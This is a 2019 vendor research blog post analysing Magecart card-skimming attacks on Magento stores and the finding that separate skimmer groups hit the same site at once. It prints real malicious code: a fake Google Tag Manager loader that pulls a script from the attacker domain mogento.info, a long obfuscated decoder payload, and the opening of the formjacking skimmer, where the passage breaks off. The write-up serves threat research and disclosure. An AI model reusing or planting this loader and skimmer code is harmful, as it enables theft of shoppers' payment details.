Back to posts

PerimeterX Research Team Uncovers New Trend in Magecart Attacks: Multiple Magecart Groups Attacking Simultaneously

November 3, 2019
  • Mickey Alton
  • Mickey Alton
  • Research Team Leader

Magecart attackers are tripping over each other for your users’ data.

The PerimeterX research team has recently investigated multiple Magecart attacks and has observed an interesting new trend: multiple Magecart attacks are skimming credit cards from sites at the same time. Each observed attack used a different technique and simultaneous attacks did not appear to be coordinated. There is also a larger trend starting where Magecart attacks are becoming more organized, with attackers sharing tools and targeting sites using e-commerce platforms. In some cases the groups are running attack campaigns simultaneously without realizing in an effort to maximize reach while minimizing their level of effort.

Our research team began investigating the Magecart attack on Sixth June as soon as it was reported. When an attack is brought to our team’s attention, they delve deep into the kill chain to get insights on how the attack is evolving. As we dug deeper into the attack, we started to piece together the chain of skimmers, the hosting sites, other affected sites and the attack techniques. Additionally, we made an interesting discovery of simultaneous Magecart attacks on PEXSuperstore.com. We have informed the website owners mentioned in this blog about their respective attacks prior to publishing this information.

In this blog, we will detail our findings on the Sixth June Magecart attack and show how we investigated the entire kill chain, leading to the discovery of the new trend of simultaneous skimming attacks on websites. The PEXSuperstore.com attack is an example of this trend of two attacks happening simultaneously.

The following attack chart shows the path that our research team took to discover this new trend. We started with Sixth June and found the skimming data being posted to the hostname mogento.info which is also hosting the skimmer. Scanning the web for other sites posting data to mogento.info, we found other sites infected by the same skimmer, including PEXSuperstore.com. From the full analysis of PEXSuperstore.com, we found a second Magecart attacker injecting yet another skimmer and exfiltrating card data to https://assetstorage.net/, a site registered in Russia less than two months ago. The relatively short age of the domain is an indicator of its suspicious intent.

Multiple Magecart groups attacking simultaneously

The two skimmers were completely different from each other in terms of code, obfuscation level and complexity. But, both attacks targeted Magento-based sites and used similar methods of code injection and served malicious first-party code to unsuspecting users. The Sixth June attacker directly compromised the websites with a decoy snippet that masqueraded as a Google Analytics script. The Sixth June attacker also used a much simpler loader on PexSuperstore when compared to the Sixth June attack. Here is simple snippet variant:

  <script type="text/javascript" src="https://www.mogento.info/apiV4/apiV3.js"></script>

The decoy script then pulled in an obfuscated snippet that loads the skimmer from a remote server controlled by the attacker. This direct site compromise is called a first-party attack. The second Magecart attacker also compromised the website, this time with no loader script planted. The attacker modified the first-party script related to the checkout process and added skimming code at the bottom of the original script.

Sixth June Magecart attack breakdown

On October 28th, Sixth June was mentioned as a new skimming victim on Twitter. The skimmer was implemented on the Magento-based website for over a week before Sixth June addressed it. As mentioned by the first researcher Jenkins, the malicious code did not trigger for non-US visitors or users running Linux operating systems.

Stage 1: Skimmers compromise the website.

The website was compromised by the attacker to add a malicious inline javascript snippet to the website’s code. The exact mode of compromise could not be determined, but the attacker did modify pages served from Sixth June web servers.

Stage 2: Skimmers place a malicious inline script.

An inline script was disguised as a legitimate Google Analytics tag in the source code of the website.

<!-- Google Tag Manager -->
<script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObjects']=r;a=s.createElement
(g),m=s.getElementsByTagName(g)[0];if(i.location.href.indexOf(i.atob(r))
>0){a.async=1;a.src='https://'+i.atob(o);m.parentNode.insertBefore(a,m)}})
(window,document,'bW9nZW50by5pbmZvL2FwaVY0L2FwaVYzLmpz','script','Y2hlY2tvdXQ=',
'//www.google-analytics.com/analytics.js','ga');</script>
<!-- End Google Tag Manager -->

Stage 3: Inline loader scripts loads the obfuscated skimmer script

The inline script loaded another script that was heavily obfuscated, from an external host https://mogento.info/apiV4/apiV3.js hosted on a French ASN and registered in the Netherlands on October 4, 2019. Note the attempt to deceive by using a domain similar to Magento. This script is a loader script that decrypts and executes the embedded inner script.

(function() {
    var G0h = {};
    var Vnn = (0 * "\x7fO:\x89npRi=,hwb_6})F8"["charCodeAt"](17) + 1.0);
    Ag6 = "";
    var VYd = ("kd:j4cP\x88;*\x87$H2\x7f"["length"] * 0 + 1.0);
    var H1Y = "3g2t3c0w2l1k3i1r16101l222t3b153l1x332v1k2o3i1l301i102n10362x38313e32102p181i1f191m1c1e171p3g2t3c0w362t2i1r161g1c1e1910172b2e2o3i1m1e2o3i1m2u102n10362x38313e32102p181m1j171p342d3f2x3c3j162w392v3f372x383e172n101019161k1e1s1h1n1t102o3i1l1g101o102o3i1k2w101719102x2t2w1019103j102p16303f382v3e33393816170w3l0a12162w392v3f372x383e172n101019101019161k1j1s1i1k1t102o3i1k30101o102o3i1k1m1017191038102p1610291g2v3b363i331h3d2v2b35102n103c2x3a362t2v2x102p161d2n3b3d291g1h3i2b2p1d311a1010171a101n3i2u3a3d3f333e2n243e2j391i38102n103c2x3a362t2v2x102p161d2n2o2n2j3i331n3d241i3a2p1d311a1010171a0w303f382v3e33393816173l0a3g2t3c0w3d382w0w1r383f36361p3g2t3c0w2x2e3c1r102p2l2e133b3i2j23222m2a2s3e2t2i3j3b2s38253f3a363d102n161g1c1e19102d2b1t1g3b23142o3i1m1g2h112220102n10362x38313e32102p181g1i1j1l1h1e1m1l1e1j172n103e392f3e3c333831102p16161e18102o3i1m1g1e3g1d38343c2o3i1m1n373f172o3i1m1j1r2o3i1m2t301a16102n102v322t3c1x392w2x1v3e102p161f1k17191h1g1c1e17172p161d2n2l3e2336253a3i2o2p2o132o2s3j2i2m2p1d311a1010171p3g2t3c0w33383a1r2w392v3f372x383e2n101019103b3f2x3c3j2f1019161n1j1s1i1e1t102o3i1k1j101o102o3i1k1e10171910362x2v3e393c1v3636102p161026331738193a1v2n3f1q3e3k1a1f0w3k3d1e2x14361k2x1p2s2v213e2l241a2d0w3h293e3g252x2i1f3i1l3e25302t143c2a2x2j2m2t1k1a3b1p0w1x2v1i28321e2x2n2v1g352l2u1u39143i102n103c2x3a362t2v2x102p161d2n1f2j2a2o1u251l2o2s2i1v242o193h2o1q2l2o1p1e2o142o173029281x1g21263b1i2d3g2m2o2n3k1k2p1d311a101017171p30393c0w163g2t3c0w331r161e1810262j1j1k2t2o3i1m2u1p1v37102n10362x38313e32102p191e1c1e171p331q33383a2n101019161k1f1s1g1l1t102o3i1k2v101o102o3i1k1j101719102x10191038313e1019161j1l1s1h1i1t102o3i1k1m101o102o3i1k1g10171910102p1p331919173l0w33301633383a2n332p2n101019161j1k1s1h1i1t102o3i1l1k101o102o3i1k2v101719102t363f1019102x102p2n10361019102x38311019161m1l1s1g1n1t102o3i1l1i101o102o3i1k301017191032102p1s16102o3i1m1n2k192o3i1m1g2l2r231e2o3i1m1k1k3e2o3i1m2u15102n10362x38313e32102p181e191e1c1e170w14140w33383a2n332p2n103g1019101019161k1g1s1h1l1t102o3i1k1f101o102o3i1j2u10171910363f2x102p2n10362x381019161l1h1s1i1g1t102o3i1k1l101o102o3i1k1f101719103e10191032102p1q161i18103c2o3i1m1i11382n1q1k28203g2j301c102n10362x38313e32102p191m1c1e17170w3l0w3g2t3c0w38372x1r33383a2n332p2n10331019102w102p1p33301638372x1r1r10102n16102u2t2v2o3i1m1m1v3c1521112o3i1m1e102n102v322t3c1x392w2x1v3e102p161k17181f1j1g1n1m1f1f1f1e1j191g1h1c1e172n103e392f3e3c333831102p16161i1c1e19101k3a1j363k2k2o3i1m1m19102n10362x38313e32102p181i17172p16103k25392d3k253d381h30101a101017170w3l0w38372x1r331p2i3f2f1r161e18101q3g29223m1o1v2g132o3i1m1f172o3i1m1g2o3i1m1j20102n102v322t3c1x392w2x1v3e102p161f1h17191h1f1c1e171p0w3n0w3d382w191r33383a2n332p2n101019101019161m1l1s1h1j1t102o3i1k1n101o102o3i1j30101719102w102p19102d1r102n103c2x3a362t2v2x102p161d2n2d2p1d311a1010171933383a2n332p2n101019161n1n1s1g1l1t102o3i1l1k101o102o3i1k2x101719102t363f1019102x102p19102s14102n161f1k1g1j1m1e1m1l1i1g18102i2f2a2j232w1u1t3l261937351628102n10362x38313e32102p191h1c1e172n103e392f3e3c333831102p16161e18102o3i1m2t1f133c282i1x2o3i1m1e2h3111142e17102n102v322t3c1x392w2x1v3e102p161m17191h1f1c1e17172p161d2n2o2s2p1d311a1010171p33221j1r101w2s2716282a35381l2f2c1g1e2i331r2t2h3d2j393h3c30102n16101a1b2i161u2v2m2o3i1k1e3g3i3c2l1p1o3h3a20152o3i1m1e1q102n102v322t3c1x392w2x1v3e102p161f1l17181l1j1k1e1n1i1n1m1k191m1c1e172n103e392f3e3c333831102p16161h1g1c1e19102f3m2e2m111h2i2k3l1x3k2v202o3i1l303734102n102v322t3c1x392w2x1v3e102p161l17181e17172p161d2n2o1r1e352o2s2c2a332h3h1w1l3c2j2o162p1d311a1010171p3n0w3n0w3330163d382w0x1r383f3636170w3l0w3g2t3c0w3c2x312x3i3a0w1r0w1d161h3m1i3m1j3m1k172n1e1b1n2p3l1f1h1a1f1k3n1d31331p2m243b1r161m1c1e191034292t1c3g2v2u35322h1s2o3i1m1n31172o3i1k1e181f1l1h102n102v322t3c1x392w2x1v3e102p161f1l17181i171p3g2t3c0w3c2x1r3d382w2n101019161m1k1s1k1t102o3i1l1g101o102o3i1k2v101719102x1019103a362t2v1019161j1i1s1i1m1t102o3i1k1j101o102o3i1j2v10171910102p161d0w1d311a10102n16102t1s131q2l2o3i1k1e2r3n2v2o3i1m1n141m2w102n102v322t3c1x392w2x1v3e102p161h17181m1i1e1f1f1j1f1f1h191g1n1c1e172n103e392f3e3c333831102p16161h1j1c1e19102517191r2o3i1m1f2n2l2o3i1m1h3537381x1d34102n102v322t3c1x392w2x1v3e102p161h17181e17172p1610352m2x242b3638392v1m101a101017171p331g3j1r103f272r27223k2k29282b1u2e2b2u3g2t351k1v2l2w25102n16103j3d19173i23212l372827102n102v322t3c1x392w2x1v3e102p161h17181f1g1g1n1i1h1k1l1j1f191f1m1c1e172n103e392f3e3c333831102p16161j1c1e191033133i322j11391a1c252i1j2o3i1m1f2o3i1m1n3h102n10362x38313e32102p181g17172p161d2n2e2k2t2u1v1k22283f2o1u2w2o2r2p1d311a1010171p3c2x1r3c2x2n103c2x3a1019161j1n1s1g1l1t102o3i1k2v101o102o3i1k1j101719102t1019101019161k1n1s1g1i1t102o3i1k1h101o102o3i1j2w101719102x102p161d1b1d311a10102n161g1c1e19101r131l3b2w102n10362x38313e32102p181j1m1n1l1j1i1e1m1n1g172n103e392f3e3c333831102p16161e1c1e1910372e2m1f3e3h2k27102n10362x38313e32102p181i17172p16102e213j3i2x1n3a242g3h101a101017171p383d2f1r10223e331v2a2l22381m3a3g2e2f2a372e2w1j3c1q1k102n103c2x3a362t2v2x102p161d2n1j3a2o1q33221m2a2e2p1d311a1010171p271n1k1r10232a2u3e242v3b1v2j392m2t321i2f37202m3e353o34102n103c2x3a362t2v2x102p161d2n2o3o1v2v2f1i2a23202t3e392p1d311a1010171p3g2t3c0w372t3e2v322x3d0w1r0w3c2x2n10101910372t3e1019161n1n1s1f1g1t102o3i1k1h101o102o3i1j2v1017191032102p163c2x312x3i3a171p2k1h3g1r10361v2w2d2h3c1n2a272m292i2j2p1l2k39321k2g38231m2h102n16101d2e3b2v332f2o3i1m1h32292o3i1m1e2o3i1l301s3m2j3h24102n102v322t3c1x392w2x1v3e102p161f1h17181k1m1j1l1l1l1h1n1g191f1i1c1e172n103e392f3e3c333831102p1616102v1r1c321k2h1s2x1u16261x2f2w3k102n102v322t3c1x392w2x1v3e102p161m17181e191h1k1c1e17172p161d2n2a1k2o2p1v292i3c2k39362d1m38272p1d311a1010171p333016372t3e2v322x3d0x1r383f3636173l0a3330163b2g3h16372t3e2v322x3d2n16102o3i1m1m2o3i1l302d251v3j393l1r372k102n10362x38313e32102p181e191e1c1e172p171r1r3e3c3f2x173l0a3d382w1r281f36163d382w19101m3h1437163d2x323c391m3a231r102n103c2x3a362t2v2x102p161d2n3h23372o162x3c1m2p1d311a101017193h33382w393h2n1036392v2t1019161n1g1s1k1t102o3i1l1i101o102o3i1k301017191010191033391019161k1f1s1h1h1t102o3i1k2x101o102o3i1k1l10171910102p2n101019161n1j1s1e1t102o3i1k1m101o102o3i1k1g10171910393d1019103e102p1910292g14292v3g2t39253c172w1k2r2h1f2j1g1b1n1h3j3k1r102n103c2x3a362t2v2x102p161d2n393g2j2g2o1b1n2o17293k3j2h251k2p1d311a10101719372t3e2v322x3d2n161e1c1e19102p3a2o3i1m1l2o3i1m1k2x2t3g242b1s283d1b27102n102v322t3c1x392w2x1v3e102p161f1h17181e172p171p1v1l2m1r103a1v131n3k35221g3f2j2x2i13262l231h2s2a1s1k3g1m102n103c2x3a362t2v2x102p161d2n2o2s2o1s3a2x222j233g2o132l3k1g2p1d311a1010171p3g2t3c0w2a37271r103g222w312w142i3d1p382s1g1937172m332a221w0x2u102n103c2x3a362t2v2x102p161d2n2o1p332o192o14222o172o0x2i312o2s3g2p1d311a1010171p3g2t3c0w312b1w1r103633163c351i2d3j221n1s281m3g331r1e3f172x391h102n16101d141k1h3f3k181e2d16102n102v322t3c1x392w2x1v3e102p161n17181m1m1k1f1n1m1k1f1k191g1l1c1e172n103e392f3e3c333831102p1616101l182g1t2o3i1m1m1g2l242w211s2b2o3i1m1i1a2q1p1k102n102v322t3c1x392w2x1v3e102p161j17181e191h1h1c1e17172p161d2n222o162o172o1r3g28363f2d2o1s35392p1d311a1010171p3g2t3c0w2i391g1r101n3k3h3c11363h1v181l1u2g2i2j3g3d1k1q33302h1x102n161i1l1c1e1910161o2o3i1m1g202r1w261m1l273c3j292q102n102v322t3c1x392w2x1v3e102p161m17181k1i1i1j1e1m1e1m1i172n103e392f3e3c333831102p16161h1h1c1e19102p1x161o2g182q1u1a2n3n2l313a3d1t102n102v322t3c1x392w2x1v3e102p161f1f17181e17172p161d2n2o1q3d2o18302o112o1u2j2i3h2h1n2p1d311a1010171p3e251f1r101f112e231g163j3o313e1i2l1l1g111h3i1m303k1d3d102n16101m2o3i1m1f2o3i1m1h2a1l153o2k1f2r102n102v322t3c1x392w2x1v3e102p161i17181i1i1h1i1e1g1h1m1i191f1h1c1e172n103e392f3e3c333831102p16161n1c1e19102o3i1l303e3b1j3n37262o3i1m1l39292m102n10362x38313e32102p181g17172p161d2n2o3o3i2o162o1d3e301f232l1l2o112p1d311a1010171p2a292h1r10203k3a3821352m2c3b1v1e3a2e2g2u1n2g1r271j362p3k102n103c2x3a362t2v2x102p161d2n1n212e202c2o2p1v2u2m1j2o1r3a2p1d311a1010171p2g2g1i1r161f1m1c1e19103b2o3i1m1e3a1r2a3g2n2o3i1m1g13292t2v2o3i1l301s2o3i1m2u102n102v322t3c1x392w2x1v3e102p161n17181g171p3g2t3c0w201n2d1r161g1i1c1e19101d2o3i1m2t3420331q3d2r3f2o3i1m1n1e1c1v2d102n102v322t3c1x392w2x1v3e102p161f1h17181e171p3g2t3c0w352x3j1r281f36163h33382w393h2n1010191036392v2t1019161j1j1s1h1t102o3i1l1i101o102o3i1k2v10171910333938102p2n10321019161l1n1s1i1e1t102o3i1k30101o102o3i1k1j101719101019101019161k1j1s1f1g1t102o3i1l1h101o102o3i1k2w101719103e102p171p3b2t201r101g281b1p2u1f3i2x3d282023260x241h2c1n2a3c2b2m1w2f102n103c2x3a362t2v2x102p161d2n1f2m1n3c1w1g2o0x3d20262o1b2x1h2o1p2p1d311a1010171p3g2t3c0w2w2t3e2t1r102j2s3a323h381l19313f1r102n103c2x3a362t2v2x102p161d2n2o193h2j3f322o2s1l2p1d311a101017193d382w19101x142v2c35292x1s363j3o1r102n103c2x3a362t2v2x102p161d2n292o1s2v2o3o2c1x362p1d311a10101719352x3j1p3g2t3c0w273b3g1r161g1c1e19101x2o3i1m1k123a2m102n10362x38313e32102p181n1j171p3f3c36360w1r102d1f321j3e2m3e183a22173d281o1p1d1g261d2d273h1i273h2d3h1i1c2n371j3918310x2x2538173e2n39201c2b3326243821301m2s391r1d161s331i263722112t2a31263o2x133d2f1d163g1g332k3d1i2t241m1b2s3o372p2t193d273e2g272x1u3c1s2v2u2m2t1f3c0x2w2m2k1b3f2t2h371j2x1g3i1x2r1n1e1h1c2i3a2b382g31102n103c2x3a362t2v2x102p161d2n1f2d1g242o0x1j2o192o132o1s2o112o172u2o3o2g2a2o1p272o1r2i2o2n3f2o2p1n25212o162h1x222f2b20262o1u1h1i1m2o18282k2o2s2m2p1d311a1010171p343c331r101x293h331e2f1m311w22383c1s2k3k2w2s3i271x251g3b36102n103c2x3a362t2v2x102p161d2n1x3k1g272f1e223h313c2o2s2o1s3b2p1d311a1010171p342d3f2x3c3j2n102t1019161n1i1s1h1l1t102o3i1k2t101o102o3i1k1f101719101019102t1019161k1h1s1h1f1t102o3i1l1m101o102o3i1l1h10171910102p163l0w3e3j3a2x1o103a2c2h2t2b212f332g102n103c2x3a362t2v2x102p161d2n332h3a2t212p1d311a1010171a0w3f3c361o0w3f3c36361a0w2w2t3e2t1o2w2t3e2t0w0w0w0w0w0w0w0w0w0w0w0w0w0w0w0w3n170w3n0w3n3n0a3n173n171p3g3h341r1610111b2b1g1j2i391e133b3j102n102v322t3c1x392w2x1v3e102p161i17181h191i1l1c1e171p303f382v3e3339380w3b2g3h163d170w3l0w3g2t3c0w3g0w1r102x1e3d1f281g1p1h1v1i351q1j1d1k201l2p1m3j181n102n161f1k1g1j1m1e1m1l1i1g18101h251n312m1c2o3i1m1g1f2r162o3i1m1f341j332o3i1m1e102n10362x38313e32102p191h1c1e172n103e392f3e3c333831102p16161e1810323g3o1l2v1r3a1s2e2o3i1m1n2n2d102n102v322t3c1x392w2x1v3e102p161f1e17191h1f1c1e17172p161d2n1v2o1q2o182o1d352o1p28203j2o2p2x3d2p1d311a1010171p3f1f261r102b1g2f1p2h2v2j383921221x3i38232m3o2x2c1316281h20102n16102n1j1w2o3i1m1m1d2o3i1m2u30211k102n10362x38313e32102p181j1k1e1e1l1k1l1i1g1h191g1c1e172n103e392f3e3c333831102p1616101w263i2o3i1m2u2m172t2a20331m3f2o3i1m1n36152o3i1k1e3c2r18102n102v322t3c1x392w2x1v3e102p161f1e17181e191h1j1c1e17172p161d2n2f2123382b1x2o1p2o3o2x1h2o132v2o162p1d311a1010171p3g2t3c0w3h0w1r10102n16103b2o3i1m2u2k1d391b1a102n10362x38313e32102p181h1i1m1h1m1l1j1m1l1k191f1c1e172n103e392f3e3c333831102p16161h1f1c1e19103i3f2o3i1m1f2k2c23351l2o3i1m1g2o3i1m1m2r3g2j102n102v322t3c1x392w2x1v3e102p161j17181e17172p1610391n1l3k2534223i2w2f101a1010171p30393c0w16331r161e18103h153827131s1o29242u1f1839102n102v322t3c1x392w2x1v3e102p161i17191e1c1e171p0w330w1q0w3d2n101019161m1k1s1f1i1t102o3i1k2v101o102o3i1k1g101719102x38311019101019161f1e1e1s1n1t102o3i1l1i101o102o3i1k2w1017191032102p1p0w331919170w3l0w3i0w1r0w3d2n102v1019101019161j1l1s1h1t102o3i1k1m101o102o3i1k1e101719102t3c1v3e102p1633171p33300w163g2n1033101910382w2x1019161n1f1s1i1e1t102o3i1l1m101o102o3i1l1g101719102b30102p163i1a16101o2v2e2q3b3j3m1i1p3h2x2o3i1m1h2h1u24291e102n102v322t3c1x392w2x1v3e102p161f1g17181e191e1c1e17170w0x1r0w1b161f1c1e19101i252c312l102n10362x38313e32102p181e17170w3h0w191r0w3i1p2a2l1v1r16103l2g123k2o3i1k1e1x1a1d2o3i1m1e1g102n10362x38313e32102p181i1j191i1c1e171p3n0w340w1r0w3h2n10101910362x38313e1019161m1m1s1i1t102o3i1k1m101o102o3i1j2x10171910102p0w1d0w161g1c1e19102x2q1p2p1a2b2o3i1m1n3f3n3d3m252r1b1m13362o3i1m1i2k102n102v322t3c1x392w2x1v3e102p161f1m17181e171p3g2t3c0w2w31201r161g1g1c1e19102u182o3i1m1e3829161u31193n2o3i1k1e1x23102n102v322t3c1x392w2x1v3e102p161j17181l171p350w1r0w292t3e322n10301019103639391019161m1k1s1h1g1t102o3i1l1g101o102o3i1k2v10171910102p1634171p28222x1r101r3d1m1j1e1l2336162i3o371g2l2k1w263b302g2a19192i102n161g1l1i1e1f1g1l1e1n1810312h2o3i1k1e332l3i2b1p1n3j112m2o3i1m1i3k2o3i1m1n322f21102n102v322t3c1x392w2x1v3e102p161i17191h1g1c1e172n103e392f3e3c333831102p161610243b2o3i1m1h2e342u2x13102n10362x38313e32102p181h191l1c1e17172p161d2n1l232o3o1m2g3b2o1r2o16372o191w1j2l2p1d311a1010171p370w1r0w292t3e322n102v2x1019161k1j1s1l1t102o3i1k1n101o102o3i1k1h1017191010191036102p1634170w1b0w351p1w1h3e1r10331i263h2u3f2b2j3h2e19363i222a2g2d2h2k2c242f2m3i1f102n16101l1b1j3h2330132i2q2o3i1m1m3m34353n102n102v322t3c1x392w2x1v3e102p161g17181i1k1e1f1h1i1j1i1n191h1k1c1e172n103e392f3e3c333831102p16161h1f1c1e19103m2e1k2o3i1m1m312o3i1m1l2m36322i1n2c252o3i1m2t1w3n173j102n102v322t3c1x392w2x1v3e102p161f1i17181e17172p161d2n2o1922243i2f3f2h2b3h2k1i332g2p1d311a1010171p2v0w1r0w16101l2h233l34252m2v211m27321b1d2o3i1m1n102n102v322t3c1x392w2x1v3e102p161f1h17181e191e1c1e171p30393c0w16331r161e1c1e19101w1l2o3i1m1e1t352n102n10362x38313e32102p181e171p0w331q351p0w331919170w3l0w2t0w1r0w3h2n101019161n1g1s1f1f1t102o3i1k1h101o102o3i1j2x10171910321019102t1019161k1e1s1f1l1t102o3i1l1g101o102o3i1k2v101719101v3e102p16331816102c2j3o162t1u20381c1511331j102n10362x38313e32102p181e191g1c1e171937170w180w161e18101a171w261i2o3i1m1m2l2o3i1m2t183g382v102n10362x38313e32102p191g1c1e171p2v0w191r0w2t0w1s0w16102o3i1k1e3h3b241m1h3d2d341t2o3i1m1l3e3f3k1g2o3i1m1j1k3i13102n102v322t3c1x392w2x1v3e102p161l17181e191n1c1e170w1t0w292t3e322n10101910303639391019161l1f1s1e1t102o3i1l1g101o102o3i1k1m10171910102p162t1d161e1810113j3b261n1o1i323f132o3i1m1g2o3i1k1e3a122o3i1m2u102n10362x38313e32102p191f1e1c1e170w190w2t13161f1e1c1e19102o3i1l302d3d1r352l3o3e2b143l2o3i1m1g102n102v322t3c1x392w2x1v3e102p161j17181e17170w1o0w2t1p3n0w30393c0w16331r16102f1h2o3i1k1e323g3m1s381o2p3e102n10362x38313e32102p181e191e1c1e171p0w331q3519371p0w331919170w2v0w191r0w3h2n102v322t1019161f1e1e1s1i1m1t102o3i1l1g101o102o3i1k1m101719101019101019161f1e1e1s1f1j1t102o3i1i1f101o102o3i1h2t101719103e102p16331816103n1t1j2h371b2o3i1m1g20361x1r141c102n10362x38313e32102p181e191g1c1e17191f1b37170w180w161e18102e122o3i1m1j382r2v3919132q3b2c2o3i1k1e1b102n10362x38313e32102p191f1c1e171p3c2x3e3f3c380w162v1316102t2p1j2i1e243g2o3i1m1j2o3i1m1e251r2b1b2o3i1m1i102n10362x38313e32102p181e191f1e1c1e170w1r1r0w161e1810143m3h25312o3i1k1e1w1e3o102n10362x38313e32102p191e1c1e17171p333h1l1r10162l393h1g383223202m113f2p2k2r1x343o3h2723102n16102o3i1m1f3o3c113n3e351q1a3d2a102n10362x38313e32102p181g1g1f1l1e1f1f1n1g1f191g1c1e172n103e392f3e3c333831102p1616103a233h362h1216303d2c2e1g382o3i1m1e1o27312b28102n102v322t3c1x392w2x1v3e102p161f1m17181e191h1f1c1e17172p161d2n2o3o202o2p2o112o16392o2r27321g1x2p1d311a1010171p3n0w303f382v3e3339380w281f36163e322x2g2x3i3e170w3l0a393f3e3a3f3e0w1r0w382x3h0w2f3e3c3338311p2a333g1r16101t343j3a3c2o3i1k1e321b2o3i1m1i1f3i3n302f332r2o3i1m1n102n102v322t3c1x392w2x1v3e102p161f1h17181h191h1f1c1e171p292w321r10391j0x2c1s2x2i331j311f2w1n172d1w1l11353h3o3f102n103c2x3a362t2v2x102p161d2n3h2x2o0x2o171w2o3o332o1s2o112w31392p1d311a1010171p2g2x373a0w1r0w382x3h0w1v3c3c2t3j16171p3g2t3c0w2u2w231r10312c21321g1b2v39283g36172p2j3j20181d1h2s333a113c102n161j1i1c1e1910382g321b1w2o3i1m1g24192126102n102v322t3c1x392w2x1v3e102p161n17181h1n1m1i1m1g1i1n1g172n103e392f3e3c333831102p16161g18102r2o3i1m2u15332b2e241s3k2k1k102n10362x38313e32102p191f1e1c1e17172p161d2n2o172o2s2o1d313g322o2p2o113j2o1b2o1839332c2p1d311a1010171p2g2x373a1g0w1r0w382x3h0w1v3c3c2t3j16171p383g1x1r16101k261p3j1i3o102n10362x38313e32102p181g1f191i1c1e171p2g2x3i3e2f333k2x0w1r0w3e322x2g2x3i3e2n10101910362x38313e1019161k1m1s1g1h1t102o3i1k1m101o102o3i1j2x10171910102p1p30393c0w16330w1r0w161e1c1e1910141a182o3i1m1e303d102n10362x38313e32102p181e171p0w330w1q0w2g2x3i3e2f333k2x1p0w331919170w3l0w3c382w0w1r0w292t3e322n103c1019161l1e1s1h1f1t102o3i1k30101o102o3i1k1n101719101019101019161m1h1s1f1n1t102o3i1l1j101o102o3i1k2v10171910382w102p16292t3e322n101019161m1n1s1g1m1t102o3i1l1g101o102o3i1k1m101719102t382w3910191037102p16170w180w161g1i18101u252x3e36102n10362x38313e32102p191g1c1e17170w190w16101k2o3i1m1f241w1b1s2n351u3i1d1c383n2x3j102n102v322t3c1x392w2x1v3e102p161m17181f191i1c1e171p2g2x373a2n332p0w1r0w3e322x2g2x3i3e2n102v322t1019161l1j1s1g1m1t102o3i1l1g101o102o3i1k2v101719101019101x391019161k1k1s1f1n1t102o3i1k1i101o102o3i1j2w101719102x1v3e102p1633170w190w3c382w1p3g2t3c0w3j12341r102v1e1i243i1b3e1p342a36333819311s1j2i2833142b2h30102n16102o3i1m1g331t2o3i1m1l2o3i1k1e2m3n3h1r1k1f2o3i1m1j2k102n102v322t3c1x392w2x1v3e102p161m17181n1l1m1e1l1j1n1j1g191i1k1c1e172n103e392f3e3c333831102p16161m1c1e19102e2o3i1m1m3a3l36281w132o3i1m1j27152o3i1m1k3i1j102n10362x38313e32102p181g17172p161d2n1e2o1p282o1b2h2i2o1s2o1934362o1424382v2p1d311a1010171p383i391r102e362c292s3d2m281x3k332x2s1l2b2u27141h2t1w3c35102n103c2x3a362t2v2x102p161d2n2e2b3c3k2c2o14282t2o2s3d272x2p1d311a1010171p312u2f1r1610262o3i1l302x3m2b1e2l1x1o222o3i1m1f28151k392p1w2q1t102n102v322t3c1x392w2x1v3e102p161f1k17181f191i1k1c1e171p2g2x373a1g2n332p0w1r0w3c382w1p3n0a30393c0w16330w1r0w161e1c1e1910202u112o3i1m1k222h1s24311p2e1u102n102v322t3c1x392w2x1v3e102p161f1f17181e171p0w330w1q0w2g2x3i3e2f333k2x1p0w331919170w3l0w393f3e3a3f3e0w191r0w2f3e3c3338312n10303c39371019161l1l1s1f1k1t102o3i1i1h101o102o3i1h2t10171910322t3c1019101x392w1019161k1l1s1h1l1t102o3i1k1j101o102o3i1j3010171910102p162g2x373a2n332p1a0w2g2x373a1g2n332p171p3n0a3c2x3e3f3c380w393f3e3a3f3e1p2v3g1v1r101v281n172v333a332f2d172t1q1g2c1w1k2k2h311d1v2b102n16102o3i1m2u1a2r2g3c1x102n10362x38313e32102p181i1e1k1i1j1g1f1m1j1j191h1c1e172n103e392f3e3c333831102p16161h1f1c1e19102b353e133n2d241v212h31153d19102n102v322t3c1x392w2x1v3e102p161f1h17181e17172p161d2n2o1d1v1k282c332d2o172h2o1q2p1d311a1010171p3n0w1p1x332m1r161j1c1e1910361m2b371p263n2520102n10362x38313e32102p181i1l17";
    xx = "".constructor;
    var J42 = (4.0 + "v\x87gNkA3hEu|\x88UzC"["length"] * 2);
    for (var Eqq = (0.0 + "\x80D-vV8I\x8b?"["length"] * 0); Eqq < H1Y["l" + (88 > 29 ? "\x65" : "\x5e") + "" + "" + (62 > 23 ? "\x6e" : "\x67") + "gth"]; 
        Eqq += ("^%Ir?|g)@d~>X,"["charCodeAt"](12) * 0 + 2.0)) {
        Ag6 = Ag6 + String["from" + (65 > 41 ? "\x43" : "\x39") + "ha" + "rCo" + (58 > 35 ? "\x64" : "\x5a") + "e"](parseInt(H1Y["s" +
        (96 > 28 ? "\x75" : "\x70") + "bs" + "" + (95 > 22 ? "\x74" : "\x6c") + "r"]
            (Eqq, ("A~V+YCtW0u@q{Kl?Ze2("["charCodeAt"](15) * 0 + 2.0)), J42));
    }
    ;VYd = "setTimeout(Ag6," + Vnn;
    VYd = VYd + ");";
    G0h["" + (98 > 24 ? "\x74" : "\x6b") + "oSt" + "r" + (74 > 23 ? "\x69" : "\x61") + "ng"] = xx["con" + (85 > 5 ? "\x73" : "\x6a") + "truct" + "" +
    (87 > 5 ? "\x6f" : "\x67") + "r"](VYd);
    s = G0h + ".";
}
)();

Stage 4: Obfuscated skimmer script exfiltrates credit card

The malicious script that was imported from mogento.info loaded an inner script, also heavily obfuscated. This script is the skimmer itself, which is placing ongoing event listeners and accesses all document object model (DOM) element values. The script also exists on checkout pages which contain highly sensitive personally identifiable information (PII) and payment details.

The final formjacking script of the skimmer:

var Y6x=("7Faq'{Cic6\x7f4"["length"]*41+8.0);var laV=(2.0+")OR\x80\x8b"["length"]*85);jQuery(document)[""+(60>39?"\x72":"\x6d")+"ead"+"y"](function() {
$(document)[""+""+(65>46?"\x6f":"\x68")+"n"]("M2cqlxi3scOk"["replace"](/[qsM23xO]/g,""),"9xbpsuit[HtWo4n"["replace"](/[\[Wxi9sH4p]/g,""), function(){
